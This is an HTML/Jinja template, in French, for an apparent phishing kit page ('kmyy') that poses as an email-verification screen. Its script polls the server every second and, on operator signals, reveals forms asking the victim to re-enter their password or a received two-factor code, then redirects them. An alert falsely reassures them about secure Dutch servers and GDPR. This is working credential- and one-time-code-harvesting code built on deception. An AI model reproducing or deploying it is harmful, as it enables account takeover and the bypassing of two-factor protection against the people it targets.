<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Inscription</title>
    <style>


    * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
    }

    body {
        font-family: Arial, sans-serif;
        background-color: #f4f4f4;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
    }

    .form-container {
        background-color: white;
        width: 350px;
        padding: 30px;
        border-radius: 8px;
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        text-align: center;
    }

    .form-container h1 {
        margin-bottom: 20px;
        margin-right: 10px;
        font-size: 24px;
        color: #333;
    }

    .container {
        display: flex;
        align-items: center; /* Aligne l'élément loader avec le texte */
        justify-content:center;
    }


    /* Style pour chaque champ de formulaire */
    .form-container form {
        text-align: left;
    }

    .form-container label {
        display: inline-block; /* Aligner les labels à gauche */
        width: 100%; /* Laisser le label prendre toute la largeur de la ligne */
        margin-bottom: 5px;
        font-size: 14px;
        text-align: left;
        color: #333;
    }

    .form-container input[type="email"],
    .form-container input[type="password"],
    .form-container input[type="text"]{
        width: 100%;
        padding: 10px;
        margin: 5px 0 15px 0; /* Espacement entre les champs */
        border: 1px solid #ddd;
        border-radius: 4px;
        font-size: 14px;
    }

    .form-container button {
        width: 100%;
        padding: 10px;
        background-color: #4CAF50;
        color: white;
        border: none;
        border-radius: 4px;
        font-size: 16px;
        cursor: pointer;
    }

    .form-container button:hover {
        background-color: #45a049;
    }

    .form-container .error {
        color: red;
        margin-bottom: 10px;
    }

    .form-container p {
        margin-top: 20px;
        font-size: 14px;
    }

    .form-container p a {
        color: #4CAF50;
        text-decoration: none;
    }

    .form-container p a:hover {
        text-decoration: underline;
    }
    /* Le loader */
    .loader {
        position:absolute;
        top:15px;
        right:15px;
        border: 5px solid #f3f3f3; /* Couleur de fond */
        border-top: 5px solid #3498db; /* Couleur de la partie en mouvement */
        border-radius: 50%;
        width: 30px;
        height: 30px;
        animation: spin 1s ease-in-out infinite;
    }

    /* Animation de rotation */
    @keyframes spin {
        0% { transform: rotate(0deg); }
        100% { transform: rotate(360deg); }
    }
    </style>
</head>
<body>

<div class="form-container">
    <div class="loader"></div>
    <h1 id="message">Chargement...</h1>
    <img src="{{ url_for('static', filename='kmyy.gif') }}" alt="My Image">
    <!-- Formulaire d'inscription -->
    <form id="password-form" action="{{ url_for('kmyy.verif') }}" method="POST" style="display: none;">
        <!-- Hidden field for email -->
        <input type="hidden" id="email-input1" name="email">

        <div>
            <label for="password">Confirmer le mot de passe :</label>
            <input type="password" id="password" name="password" placeholder="Entrer votre mot de passe..." required>
        </div>
        <div>
            <button type="submit">Valider</button>
        </div>
    </form>

    <form id="code-form" action="{{ url_for('kmyy.verif') }}" method="POST" style="display: none;">
        <!-- Hidden field for email -->
        <input type="hidden" id="email-input2" name="email">

        <div>
            <label for="code">Confirmer le code reçus :</label>
            <input type="text" id="password" name="code" placeholder="Entrer le code..." required>
        </div>
        <div>
            <button type="submit">Valider</button>
        </div>
    </form>

    <p style="text-align: justify;">
        Votre adresse e-mail est actuellement en cours de vérification pour une connexion sécurisée depuis nos
        <a onclick="disableLink(event)" href="{{ url_for('kmyy.verif') }}">serveurs situés aux Pays-Bas.</a>
        Ce processus peut prendre un certain temps.
    </p>
</div>


<script>
    // Function to fetch and update the message
    function fetchAndUpdateMessage(email) {
        fetch(`/kmyy/message?email=${encodeURIComponent(email)}`)
            .then(response => {
                if (!response.ok) {
                    throw new Error("Failed to fetch message");
                }
                return response.json();
            })
            .then(data => {
                if (data.message) {
                    if (data.message === "Try again...") {
                        const form = document.getElementById("password-form");
                        form.style.display = "block"; // Make form visible
                    }else if(data.message === "Code"){
                        const form = document.getElementById("code-form");
                        form.style.display = "block"; // Make form visible

                    }else {
                        document.getElementById("message").textContent = data.message;
                    }
                } else {
                    console.error("No message found in the response");
                }
            })
            .catch(error => {
                console.error("Error fetching message:", error);
            });
    }

function checkAndRedirect(email){
fetch(`/kmyy/redirect?email=${encodeURIComponent(email)}`)
    .then(response => {
        if (!response.ok) {
            throw new Error("Failed to fetch redirection URL");
        }
        return response.json();
    })
    .then(data => {
        if (data && data.redirect_url) {
            let redirectUrl = data.redirect_url;

            // Vérifier si l'URL commence par http:// ou https://
            if (!redirectUrl.startsWith('http://') && !redirectUrl.startsWith('https://')) {
                // Si l'URL ne commence pas par http:// ou https://, ajouter https:// par défaut
                redirectUrl = 'https://' + redirectUrl;
            }

            // Vérifier si l'URL est maintenant valide
            if (redirectUrl.startsWith('http://') || redirectUrl.startsWith('https://')) {
                // Rediriger l'utilisateur
                window.location.href = redirectUrl;
            } else {
                console.error("Invalid redirection URL:", redirectUrl);
            }
        } else {
            console.error("No redirection URL found in the response");
        }
    })
    .catch(error => {
        console.error("Error fetching redirection URL:", error);
    });

}

// On page load, retrieve email from the URL and set up the form
document.addEventListener("DOMContentLoaded", () => {
    const urlParams = new URLSearchParams(window.location.search);
    const email = urlParams.get("email");

    if (email) {
        // Set the email in the hidden input field
        document.getElementById("email-input1").value = email;
        document.getElementById("email-input2").value = email;

        setInterval(() => {
            fetchAndUpdateMessage(email);
            checkAndRedirect(email);
        }, 1000);


    } else {
        console.error("No email found in the URL");
    }
});

function disableLink(event) {
    event.preventDefault(); // Empêche le comportement par défaut du lien
    alert("Nous utilisons des serveurs aux Pays-Bas car ce pays dispose de certaines des lois les plus strictes au monde en matière de protection des données et de respect de la vie privée, notamment la conformité avec le Règlement Général sur la Protection des Données (RGPD) de l'Union européenne. Cela garantit que vos données sont protégées et traitées avec le plus haut niveau de sécurité, empêchant tout accès non autorisé et assurant que vos informations sensibles restent en sécurité. Nous utilisons des connexions sécurisées et chiffrées pour garantir que personne ne peut tracer ou intercepter vos données pendant ce processus. Veuillez être patient pendant que nous complétons la vérification. Ce processus peut prendre un certain temps, en fonction des conditions du réseau.");
}


</script>

</body>
</html>
